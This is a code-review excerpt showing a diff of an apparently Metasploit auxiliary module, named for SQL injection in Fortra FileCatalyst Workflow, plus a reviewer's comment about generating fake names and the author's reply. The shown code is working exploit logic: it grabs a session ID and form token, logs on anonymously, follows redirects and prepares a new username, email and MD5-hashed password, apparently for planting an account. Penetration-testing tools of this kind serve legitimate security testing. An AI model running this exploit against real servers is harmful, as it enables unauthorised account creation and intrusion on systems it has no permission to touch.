modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb

```diff
@@ -0,0 +1,272 @@
+    else
+      fail_with(Failure::UnexpectedReply, 'JSESSIONID not found.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/jsp/logon.jsp;jsessionid=#{jsessionid}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    body = res.body
+    if body =~ /name="FCWEB\.FORM\.TOKEN" value="([^"]+)"/
+      token_value = ::Regexp.last_match(1)
+      print_status("FCWEB.FORM.TOKEN value: #{token_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'FCWEB.FORM.TOKEN not found.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "workflow/logonAnonymous.do?FCWEB.FORM.TOKEN=#{token_value}"),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /^Location:\s*(.+)$/
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #1: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    raw_res = res.to_s
+    if raw_res =~ /^Location:\s*(.+)$/
+      location_value = ::Regexp.last_match(1).strip
+      print_status("Redirect #2: #{location_value}")
+    else
+      fail_with(Failure::UnexpectedReply, 'Location header not found.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, location_value.to_s),
+      'headers' => {
+        'Cookie' => "JSESSIONID=#{jsessionid}"
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    h2_tag = html.at_css('h2')
+
+    if h2_tag
+      h2_text = h2_tag.text.strip
+      if h2_text == 'Choose an Order Type'
+        print_status('Received expected response.')
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside h2 tag: ' + h2_text)
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'h2 tag not found.')
+    end
+
+    t = Time.now
+    username = datastore['NEW_USERNAME']
+    password = Digest::MD5.hexdigest(datastore['NEW_PASSWORD']).upcase
+    email = datastore['NEW_EMAIL']
+    firstname = Rex::Text.rand_text_alpha(1..6)
+    lastname = Rex::Text.rand_text_alpha(1..6)
```

Comment:
This would also be a good place to use [`Faker::Name.first_name`](https://github.com/faker-ruby/faker/blob/main/lib/faker/default/name.rb#L43). Same with the last name.

Reply:
Thank you, updated.